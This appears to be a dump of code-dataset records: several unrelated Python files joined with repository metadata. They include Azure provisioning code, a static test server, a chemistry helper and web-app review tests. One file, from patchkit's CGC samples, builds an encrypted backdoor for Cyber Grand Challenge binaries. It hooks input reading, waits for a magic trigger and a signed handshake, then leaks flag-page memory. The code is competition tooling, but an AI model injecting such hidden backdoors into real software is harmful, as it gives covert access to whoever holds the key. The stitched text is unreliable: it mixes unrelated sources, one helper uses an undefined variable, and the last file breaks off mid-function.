edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge' edge_conf['network_interface_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge-nif' edge_conf['static_public_ip_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge-ip' edge_conf['primary_disk_name'] = edge_conf['instance_name'] + '-disk0' edge_conf['instance_dns_name'] = 'host-' + edge_conf['instance_name'] + '.' + edge_conf['region'] + '.cloudapp.azure.com' edge_conf['user_storage_account_name'] = edge_conf['service_base_name'] + '-' + edge_conf[ 'user_name'] + '-storage' edge_conf['user_container_name'] = (edge_conf['service_base_name'] + '-' + edge_conf['user_name'] + '-container').lower() edge_conf['shared_storage_account_name'] = edge_conf['service_base_name'] + '-shared-storage' edge_conf['shared_container_name'] = (edge_conf['service_base_name'] + '-shared-container').lower() edge_conf['datalake_store_name'] = edge_conf['service_base_name'] + '-ssn-datalake' edge_conf['datalake_shared_directory_name'] = edge_conf['service_base_name'] + '-shared-folder' edge_conf['datalake_user_directory_name'] = '{0}-{1}-folder'.format(edge_conf['service_base_name'], edge_conf['user_name']) edge_conf['edge_security_group_name'] = edge_conf['instance_name'] + '-sg' edge_conf['notebook_security_group_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + \ '-nb-sg' edge_conf['master_security_group_name'] = edge_conf['service_base_name'] + '-' \ + edge_conf['user_name'] + '-dataengine-master-sg' edge_conf['slave_security_group_name'] = edge_conf['service_base_name'] + '-' \ + edge_conf['user_name'] + '-dataengine-slave-sg' edge_conf['dlab_ssh_user'] = os.environ['conf_os_user'] keyfile_name = "{}{}.pem".format(os.environ['conf_key_dir'], edge_conf['key_name']) edge_conf['private_subnet_cidr'] = AzureMeta().get_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']).address_prefix edge_conf['edge_public_ip'] = AzureMeta().get_instance_public_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) edge_conf['edge_private_ip'] = AzureMeta().get_private_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) instance_hostname = AzureMeta().get_private_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) except Exception as err: append_result("Failed to generate infrastructure names", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: if os.environ['conf_os_family'] == 'debian': initial_user = 'ubuntu' sudo_group = 'sudo' if os.environ['conf_os_family'] == 'redhat': initial_user = 'ec2-user' sudo_group = 'wheel' logging.info('[CREATING DLAB SSH USER]') print('[CREATING DLAB SSH USER]') params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format\ (instance_hostname, os.environ['conf_key_dir'] + os.environ['conf_key_name'] + ".pem", initial_user, edge_conf['dlab_ssh_user'], sudo_group) try: local("~/scripts/{}.py {}".format('create_ssh_user', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed creating ssh user 'dlab'.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING PREREQUISITES]') logging.info('[INSTALLING PREREQUISITES]') params = "--hostname {} --keyfile {} --user {} --region {}".\ format(instance_hostname, keyfile_name, edge_conf['dlab_ssh_user'], os.environ['azure_region']) try: local("~/scripts/{}.py {}".format('install_prerequisites', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed installing apps: apt & pip.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING HTTP PROXY]') logging.info('[INSTALLING HTTP PROXY]') additional_config = {"exploratory_subnet": edge_conf['private_subnet_cidr'], "template_file": "/root/templates/squid.conf"} params = "--hostname {} --keyfile {} --additional_config '{}' --user {}" \ .format(instance_hostname, keyfile_name, json.dumps(additional_config), edge_conf['dlab_ssh_user']) try: local("~/scripts/{}.py {}".format('configure_http_proxy', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed installing http proxy.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING USERs KEY]') logging.info('[INSTALLING USERs KEY]') additional_config = {"user_keyname": edge_conf['user_keyname'], "user_keydir": os.environ['conf_key_dir']} params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format( instance_hostname, keyfile_name, json.dumps(additional_config), edge_conf['dlab_ssh_user']) try: local("~/scripts/{}.py {}".format('install_user_key', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed installing users key. Excpeption: " + str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['shared_storage_account_name'] == storage_account.tags["Name"]: shared_storage_account_name = storage_account.name if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: user_storage_account_name = storage_account.name print('[SUMMARY]') logging.info('[SUMMARY]') print("Instance name: {}".format(edge_conf['instance_name'])) print("Hostname: {}".format(edge_conf['instance_dns_name'])) print("Public IP: {}".format(edge_conf['edge_public_ip'])) print("Private IP: {}".format(edge_conf['edge_private_ip'])) print("Key name: {}".format(edge_conf['key_name'])) print("User storage account name: {}".format(user_storage_account_name)) print("User container name: {}".format(edge_conf['user_container_name'])) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: datalake_id = datalake.name print("Data Lake name: {}".format(datalake_id)) print("Data Lake tag name: {}".format(edge_conf['datalake_store_name'])) print("Data Lake Store user directory name: {}".format(edge_conf['datalake_user_directory_name'])) print("Notebook SG: {}".format(edge_conf['notebook_security_group_name'])) print("Edge SG: {}".format(edge_conf['edge_security_group_name'])) print("Notebook subnet: {}".format(edge_conf['private_subnet_cidr'])) with open("/root/result.json", 'w') as result: if os.environ['azure_datalake_enable'] == 'false': res = {"hostname": edge_conf['instance_dns_name'], "public_ip": edge_conf['edge_public_ip'], "ip": edge_conf['edge_private_ip'], "key_name": edge_conf['key_name'], "user_storage_account_name": user_storage_account_name, "user_container_name": edge_conf['user_container_name'], "shared_storage_account_name": shared_storage_account_name, "shared_container_name": edge_conf['shared_container_name'], "user_storage_account_tag_name": edge_conf['user_storage_account_name'], "tunnel_port": "22", "socks_port": "1080", "notebook_sg": edge_conf['notebook_security_group_name'], "edge_sg": edge_conf['edge_security_group_name'], "notebook_subnet": edge_conf['private_subnet_cidr'], "instance_id": edge_conf['instance_name'], "full_edge_conf": edge_conf, "Action": "Create new EDGE server"} else: res = {"hostname": edge_conf['instance_dns_name'], "public_ip": edge_conf['edge_public_ip'], "ip": edge_conf['edge_private_ip'], "key_name": edge_conf['key_name'], "user_storage_account_name": user_storage_account_name, "user_container_name": edge_conf['user_container_name'], "shared_storage_account_name": shared_storage_account_name, "shared_container_name": edge_conf['shared_container_name'], "user_storage_account_tag_name": edge_conf['user_storage_account_name'], "datalake_name": datalake_id, "datalake_tag_name": edge_conf['datalake_store_name'], "datalake_shared_directory_name": edge_conf['datalake_shared_directory_name'], "datalake_user_directory_name": edge_conf['datalake_user_directory_name'], "tunnel_port": "22", "socks_port": "1080", "notebook_sg": edge_conf['notebook_security_group_name'], "edge_sg": edge_conf['edge_security_group_name'], "notebook_subnet": edge_conf['private_subnet_cidr'], "instance_id": edge_conf['instance_name'], "full_edge_conf": edge_conf, "Action": "Create new EDGE server"} print(json.dumps(res)) result.write(json.dumps(res)) except: print("Failed writing results.") sys.exit(0) sys.exit(0)
0
0
0
0360b4a0c14622785e2c5d98e3fb589264013d5d
5,846
py
Python
samples/cgc/backdoor/01_nacl.py
EarthCompass/patchkit
7d3dd1f6ad410a1bb975b544ccb666c859ec2448
[ "MIT" ]
631
2016-08-08T01:44:40.000Z
2022-03-18T17:38:13.000Z
samples/cgc/backdoor/01_nacl.py
EarthCompass/patchkit
7d3dd1f6ad410a1bb975b544ccb666c859ec2448
[ "MIT" ]
32
2016-08-08T01:58:09.000Z
2021-06-17T11:06:51.000Z
samples/cgc/backdoor/01_nacl.py
EarthCompass/patchkit
7d3dd1f6ad410a1bb975b544ccb666c859ec2448
[ "MIT" ]
94
2016-08-08T05:10:06.000Z
2021-06-17T04:55:06.000Z
import os import sys from util import read from util.crypto.rc4 import rc4 from util.patch.syscall import find_syscall_funcs
33.988372
108
0.522237
import os import sys from util import read from util.crypto.rc4 import rc4 from util.patch.syscall import find_syscall_funcs def backdoor(pt): c = read('backdoor/tweetnacl.c') c = c.replace('#include "tweetnacl.h"', '') h = read('backdoor/tweetnacl.h') pubkey = read('backdoor/pubkey.h') randombytes = r''' void randombytes(uint8_t *msg, uint64_t len) { syscall3(SYS_random, (uint32_t)msg, len, 0); } ''' # TODO: transmit_all / receive_all? code = r''' #define NONCE_LEN 8 #define SM_LEN 0x48 void handshake() { uint8_t nonce[NONCE_LEN]; syscall3(SYS_random, (uint32_t)nonce, NONCE_LEN, 0); syscall4(SYS_transmit, 1, (uint32_t)nonce, NONCE_LEN, 0); uint32_t smlen = SM_LEN; uint8_t *sm, *m; if (syscall3(SYS_allocate, smlen, 0, (uint32_t)&sm) || (syscall3(SYS_allocate, smlen, 0, (uint32_t)&m))) { _terminate(1); } syscall4(SYS_receive, 0, (uint32_t)sm, smlen, 0); uint64_t mlen; int valid = crypto_sign_open(m, &mlen, sm, smlen, pubkey); if (valid == 0 && memcmp(m, nonce, NONCE_LEN) == 0) { syscall4(SYS_transmit, 1, 0x4347c000, 4, 0); } syscall1(SYS__terminate, 2); } ''' code = h + pubkey + code + randombytes + c backdoor_addr, size = pt.inject(c=code, size=True) # rc4-encrypt the backdoor so you can't ROP directly into the type2 pov # this block also intercepts the receive() syscall function rc4_key = os.urandom(16) # as part of rc4-encrypting, we relocate the backdoor to the NX page so it doesn't add 1000+ ROP gadgets xor = rc4(rc4_key) data = pt.elf.read(backdoor_addr, size) for i in xrange(len(data)): data[i] ^= xor.next() shadow_addr = pt.inject(raw=data, target='nx', silent=True) pt.patch(backdoor_addr, raw=size * '\x00', silent=True) # xor key so they can't just pull it out of memory key_otp = os.urandom(len(rc4_key)) key = ''.join([chr(ord(c) ^ ord(key_otp[i])) for i, c in enumerate(rc4_key)]) str2c = lambda x: ', '.join(map(str, map(ord, x))) call_backdoor = r''' void call_backdoor() { void (*backdoor)() = (void (*)())%d; char *shadow_addr = (char *)%d; size_t bd_size = %d; memcpy(backdoor, shadow_addr, bd_size); uint8_t state[256]; uint8_t rc4_key[] = {%s}; uint8_t rc4_otp[] = {%s}; int keylen = %d; for (int i = 0; i < keylen; i++) { rc4_key[i] ^= rc4_otp[i]; } ksa(state, rc4_key, keylen); rc4(state, (uint8_t *)backdoor, bd_size); backdoor(); // always exit after backdoor so there's not a decrypted type 2 POV in memory you can ROP into _terminate(0); } ''' % (backdoor_addr, shadow_addr, size, str2c(key), str2c(key_otp), len(key)) receive_hook_head = r''' void call_backdoor(); void check_init(char *buf, uint32_t size); int _receive(int fd, void *buf, uint32_t size, uint32_t *count); #define WINDOW 9 char bufsave[WINDOW] = {1}; uint32_t first = 1, saved = 1, pos = 1; int receive(int fd, void *_buf, uint32_t size, uint32_t *count) { char *buf = (char *)_buf; // shortcut if we've run and buffer is empty, or on fd > 0 if (fd != 0 || saved == 0) { return _receive(fd, buf, size, count); } else if (first) { first = 0; if (size < WINDOW) { int ret = _receive(fd, bufsave, WINDOW, &saved); if (ret) return ret; check_init(bufsave, saved); pos = 0; } else { int ret = _receive(fd, buf, size, &saved); if (ret) return ret; if (count) *count = saved; check_init(buf, saved); saved = 0; return ret; } } // flush buffer if (saved > 0 && saved < size) { memcpy(buf, bufsave + pos, saved); if (count) *count = saved; uint32_t tmp; int ret = _receive(fd, buf + saved, size - saved, &tmp); saved = 0; if (ret) return ret; if (count) *count += tmp; return ret; } else if (saved >= size) { memcpy(buf, bufsave + pos, size); if (count) *count = size; saved -= size; pos += size; } return 0; }''' receive_hook_tail = r''' void check_init(char *buf, uint32_t size) { if (size < 5) return; char hash[4]; for (int i = 0; i < 4; i++) hash[i] = buf[i]; char *key = "ECAF"; for (int i = 4; i < size; i++) { for (int j = 0; j < 4; j++) { hash[j] ^= buf[i]; } if (*(uint32_t *)hash == *(uint32_t *)key) { size = i + 1; // respond with inverted key so POV can seek ahead to handshake for (int j = 0; j < size; j++) { buf[j] ^= 0xff; } transmit(1, buf, size, 0); call_backdoor(); } } } ''' + call_backdoor def patch_receive(code, syms): if syms == ['receive']: out = [] # TODO: this is really gross text parsing out.append(receive_hook_head) for line in code.split('\n'): if line.startswith('int receive(') and line.endswith('{'): out.append(line.replace('int receive(', 'int _receive(', 1)) else: out.append(line) out.append(receive_hook_tail) return '\n'.join(out) pt.binary.linker.onpre(patch_receive)
5,697
0
23
72a8d7b86cb93e472da4a88ffcffd54c32dd8924
2,209
py
Python
pynfact/server.py
jacorbal/pynfact
3dc512ef7209b596353060616c0df2abe19a638f
[ "MIT" ]
null
null
null
pynfact/server.py
jacorbal/pynfact
3dc512ef7209b596353060616c0df2abe19a638f
[ "MIT" ]
null
null
null
pynfact/server.py
jacorbal/pynfact
3dc512ef7209b596353060616c0df2abe19a638f
[ "MIT" ]
null
null
null
# vim: set ft=python fileencoding=utf-8 tw=72 fdm=indent foldlevel=1 nowrap: """ Simple server for testing purposes. :copyright: © 2012-2020, J. A. Corbal :license: MIT """ import os import sys from http.server import HTTPServer, SimpleHTTPRequestHandler class Server: """Simple server. .. versionchanged:: 1.2.0a1 Implement ``logging`` instead of printing to ``stdout`` and/or ``stderr``. """ def __init__(self, host='127.0.0.1', port=4000, path='_build', logger=None): """Constructor. :param host: Addres where the server will be listening :type host: str :param port: Port where the server will be listening :type port: str :param path: Where the static website will be generated :type path: str :param logger: Logger where to store activity in :type logger: logging.Logger """ self.port = port self.host = host self.path = path self.logger = logger def serve(self): """Serve a specific directory and waits for keyboard interrupt. :raise FileNotFoundError: If the deploy directory doesn't exist :raise KeyboardInterrupt: If the user stops the server (``^C``) :raise OSError: If ``location:port`` is not valid or in use """ try: # Find the deploy directory os.chdir(self.path) except FileNotFoundError: self.logger and self.logger.error( "Deploy directory not found") sys.exit(61) try: # Initialize the server httpd = HTTPServer((self.host, self.port), SimpleHTTPRequestHandler) except OSError: self.logger and self.logger.error( "Address not valid or already in use") sys.exit(62) self.logger and self.logger.info( "Serving {}:{} at {}".format(self.host, self.port, self.path)) try: # Listen until a keyboard interruption httpd.serve_forever() except KeyboardInterrupt: self.logger and self.logger.info("Interrupted!")
32.014493
76
0.586238
# vim: set ft=python fileencoding=utf-8 tw=72 fdm=indent foldlevel=1 nowrap: """ Simple server for testing purposes. :copyright: © 2012-2020, J. A. Corbal :license: MIT """ import os import sys from http.server import HTTPServer, SimpleHTTPRequestHandler class Server: """Simple server. .. versionchanged:: 1.2.0a1 Implement ``logging`` instead of printing to ``stdout`` and/or ``stderr``. """ def __init__(self, host='127.0.0.1', port=4000, path='_build', logger=None): """Constructor. :param host: Addres where the server will be listening :type host: str :param port: Port where the server will be listening :type port: str :param path: Where the static website will be generated :type path: str :param logger: Logger where to store activity in :type logger: logging.Logger """ self.port = port self.host = host self.path = path self.logger = logger def serve(self): """Serve a specific directory and waits for keyboard interrupt. :raise FileNotFoundError: If the deploy directory doesn't exist :raise KeyboardInterrupt: If the user stops the server (``^C``) :raise OSError: If ``location:port`` is not valid or in use """ try: # Find the deploy directory os.chdir(self.path) except FileNotFoundError: self.logger and self.logger.error( "Deploy directory not found") sys.exit(61) try: # Initialize the server httpd = HTTPServer((self.host, self.port), SimpleHTTPRequestHandler) except OSError: self.logger and self.logger.error( "Address not valid or already in use") sys.exit(62) self.logger and self.logger.info( "Serving {}:{} at {}".format(self.host, self.port, self.path)) try: # Listen until a keyboard interruption httpd.serve_forever() except KeyboardInterrupt: self.logger and self.logger.info("Interrupted!")
0
0
0
68dd208ec7d8ba0ae708db0beebd344158030e83
691
py
Python
molsysmt/basic/has_attribute.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
molsysmt/basic/has_attribute.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
molsysmt/basic/has_attribute.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
from molsysmt._private.exceptions import * from molsysmt._private.digestion import * from molsysmt._private.lists_and_tuples import is_list_or_tuple
25.592593
79
0.738061
from molsysmt._private.exceptions import * from molsysmt._private.digestion import * from molsysmt._private.lists_and_tuples import is_list_or_tuple def has_attribute(molecular_system, attribute, check=True): from . import where_is_attribute, is_molecular_system from molsysmt.tools.attribute import is_attribute if check: if not is_molecular_system(item): raise WrongItemError(attribute) if not is_attribute(attribute): raise WrongAttributeError(attribute) output_item, output_form = where_is_attribute(item, attribute, check=False) output = False if output_item is not None: output = True return output
518
0
23
4aeef765926424bacb89047c3511142f5d667655
53,295
py
Python
api/app/reviews/tests.py
bamtak/Baobab
5489e97a536a3a1c1e994c333a1c471385116cf6
[ "Apache-2.0" ]
null
null
null
api/app/reviews/tests.py
bamtak/Baobab
5489e97a536a3a1c1e994c333a1c471385116cf6
[ "Apache-2.0" ]
null
null
null
api/app/reviews/tests.py
bamtak/Baobab
5489e97a536a3a1c1e994c333a1c471385116cf6
[ "Apache-2.0" ]
null
null
null
from datetime import datetime import json from app import db, LOGGER from app.utils.testing import ApiTestCase from app.events.models import Event, EventRole from app.users.models import AppUser, UserCategory, Country from app.applicationModel.models import ApplicationForm, Question, Section from app.responses.models import Response, Answer, ResponseReviewer from app.reviews.models import ReviewForm, ReviewQuestion, ReviewResponse, ReviewScore from app.utils.errors import REVIEW_RESPONSE_NOT_FOUND, FORBIDDEN, USER_NOT_FOUND from nose.plugins.skip import SkipTest from app.organisation.models import Organisation
42.910628
185
0.618013
from datetime import datetime import json from app import db, LOGGER from app.utils.testing import ApiTestCase from app.events.models import Event, EventRole from app.users.models import AppUser, UserCategory, Country from app.applicationModel.models import ApplicationForm, Question, Section from app.responses.models import Response, Answer, ResponseReviewer from app.reviews.models import ReviewForm, ReviewQuestion, ReviewResponse, ReviewScore from app.utils.errors import REVIEW_RESPONSE_NOT_FOUND, FORBIDDEN, USER_NOT_FOUND from nose.plugins.skip import SkipTest from app.organisation.models import Organisation class ReviewsApiTest(ApiTestCase): def seed_static_data(self): self.add_organisation('Deep Learning Indaba 2019', 'blah.png', 'blah_big.png') self.add_organisation('Deep Learning Indaba 2020', 'blah.png', 'blah_big.png') user_categories = [ UserCategory('Honours'), UserCategory('Student'), UserCategory('MSc'), UserCategory('PhD') ] db.session.add_all(user_categories) db.session.commit() countries = [ Country('Egypt'), Country('Botswana'), Country('Namibia'), Country('Zimbabwe'), Country('Mozambique'), Country('Ghana'), Country('Nigeria') ] db.session.add_all(countries) db.session.commit() reviewer1 = self.add_user('r1@r.com', 'reviewer', '1', 'Mr', 1, 1, 'M', 'Wits', 'CS', 'NA', 2) reviewer2 = self.add_user('r2@r.com', 'reviewer', '2', 'Ms', 1, 1, 'F', 'UCT', 'Chem', 'NA', 2) reviewer3 = self.add_user('r3@r.com', 'reviewer', '3', 'Mr', 1, 1, 'M', 'UKZN', 'Phys', 'NA', 2) reviewer4 = self.add_user('r4@r.com', 'reviewer', '4', 'Ms', 1, 1, 'F', 'RU', 'Math', 'NA', 2) candidate1 = self.add_user('c1@c.com', 'candidate', '1', 'Mr', 1, 2, 'M', 'UWC', 'CS', 'NA', 2) candidate2 = self.add_user('c2@c.com', 'candidate', '2', 'Ms', 3, 4, 'F', 'RU', 'Chem', 'NA', 3) candidate3 = self.add_user('c3@c.com', 'candidate', '3', 'Mr', 5, 6, 'M', 'UFH', 'Phys', 'NA', 4) candidate4 = self.add_user('c4@c.com', 'candidate', '4', 'Ms', 7, 8, 'F', 'NWU', 'Math', 'NA', 5) system_admin = self.add_user('sa@sa.com', 'system_admin', '1', 'Ms', 7, 8, 'F', 'NWU', 'Math', 'NA', 5, is_admin=True) event_admin = self.add_user('ea@ea.com', 'event_admin', '1', 'Ms', 7, 8, 'F', 'NWU', 'Math', 'NA', 5) db.session.commit() events = [ Event('indaba 2019', 'The Deep Learning Indaba 2019, Kenyatta University, Nairobi, Kenya ', datetime(2019, 8, 25), datetime(2019, 8, 31), 'KENYADABA2019', 1, 'abx@indaba.deeplearning','indaba.deeplearning'), Event('indaba 2020', 'The Deep Learning Indaba 2018, Stellenbosch University, South Africa', datetime(2018, 9, 9), datetime(2018, 9, 15), 'INDABA2020', 2, 'abx@indaba.deeplearning','indaba.deeplearning') ] db.session.add_all(events) db.session.commit() event_roles = [ EventRole('admin', 10, 1), EventRole('reviewer', 3, 1) ] db.session.add_all(event_roles) db.session.commit() application_forms = [ ApplicationForm(1, True, datetime(2019, 4, 30)), ApplicationForm(2, False, datetime(2018, 4, 30)) ] db.session.add_all(application_forms) db.session.commit() sections = [ Section(1, 'Tell Us a Bit About You', '', 1), Section(2, 'Tell Us a Bit About You', '', 1) ] db.session.add_all(sections) db.session.commit() options = [ { "value": "indaba-2017", "label": "Yes, I attended the 2017 Indaba" }, { "value": "indaba-2018", "label": "Yes, I attended the 2018 Indaba" }, { "value": "indaba-2017-2018", "label": "Yes, I attended both Indabas" }, { "value": "none", "label": "No" } ] questions = [ Question(1, 1, 'Why is attending the Deep Learning Indaba 2019 important to you?', 'Enter 50 to 150 words', 1, 'long_text', ''), Question(1, 1, 'How will you share what you have learnt after the Indaba?', 'Enter 50 to 150 words', 2, 'long_text', ''), Question(2, 2, 'Have you worked on a project that uses machine learning?', 'Enter 50 to 150 words', 1, 'long_text', ''), Question(2, 2, 'Would you like to be considered for a travel award?', 'Enter 50 to 150 words', 2, 'long_text', ''), Question(1, 1, 'Did you attend the 2017 or 2018 Indaba', 'Select an option...', 3, 'multi-choice', None, None, True, None, options) ] db.session.add_all(questions) db.session.commit() closed_review = ReviewForm(2, datetime(2018, 4, 30)) closed_review.close() review_forms = [ ReviewForm(1, datetime(2019, 4, 30)), closed_review ] db.session.add_all(review_forms) db.session.commit() review_questions = [ ReviewQuestion(1, 1, None, None, 'multi-choice', None, None, True, 1, None, None, 0), ReviewQuestion(1, 2, None, None, 'multi-choice', None, None, True, 2, None, None, 0), ReviewQuestion(2, 3, None, None, 'multi-choice', None, None, True, 1, None, None, 0), ReviewQuestion(2, 4, None, None, 'information', None, None, False, 2, None, None, 0) ] db.session.add_all(review_questions) db.session.commit() def get_auth_header_for(self, email): body = { 'email': email, 'password': 'abc' } response = self.app.post('api/v1/authenticate', data=body) data = json.loads(response.data) header = {'Authorization': data['token']} return header def setup_one_reviewer_one_candidate(self): responses = [ Response(1, 5, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.') ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1) # assign reviewer 1 to candidate 1 response ] db.session.add_all(response_reviewers) db.session.commit() def test_one_reviewer_one_candidate(self): self.seed_static_data() self.setup_one_reviewer_one_candidate() header = self.get_auth_header_for('r1@r.com') params = {'event_id': 1} response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 1) def test_one_reviewer_one_candidate_review_summary(self): self.seed_static_data() self.setup_one_reviewer_one_candidate() header = self.get_auth_header_for('ea@ea.com') params = {'event_id': 1} response = self.app.get('/api/v1/reviewassignment/summary', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_unallocated'], 2) def setup_responses_and_no_reviewers(self): responses = [ Response(1, 5, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.') ] db.session.add_all(answers) db.session.commit() def test_no_response_reviewers(self): self.seed_static_data() self.setup_responses_and_no_reviewers() header = self.get_auth_header_for('r1@r.com') params = {'event_id': 1} response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 0) def test_no_response_reviewers_reviews_unallocated(self): self.seed_static_data() self.setup_responses_and_no_reviewers() header = self.get_auth_header_for('ea@ea.com') params = {'event_id': 1} response = self.app.get('/api/v1/reviewassignment/summary', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_unallocated'], 3) def setup_one_reviewer_three_candidates(self): responses = [ Response(1, 5, True), Response(1, 6, True), Response(1, 7, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.'), Answer(2, 1, 'I want to do a PhD.'), Answer(2, 2, 'I will share by writing a blog.'), Answer(3, 1, 'I want to solve new problems.'), Answer(3, 2, 'I will share by tutoring.'), ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(2, 1), ResponseReviewer(3, 1) ] db.session.add_all(response_reviewers) db.session.commit() def test_one_reviewer_three_candidates(self): self.seed_static_data() self.setup_one_reviewer_three_candidates() header = self.get_auth_header_for('r1@r.com') params = {'event_id': 1} 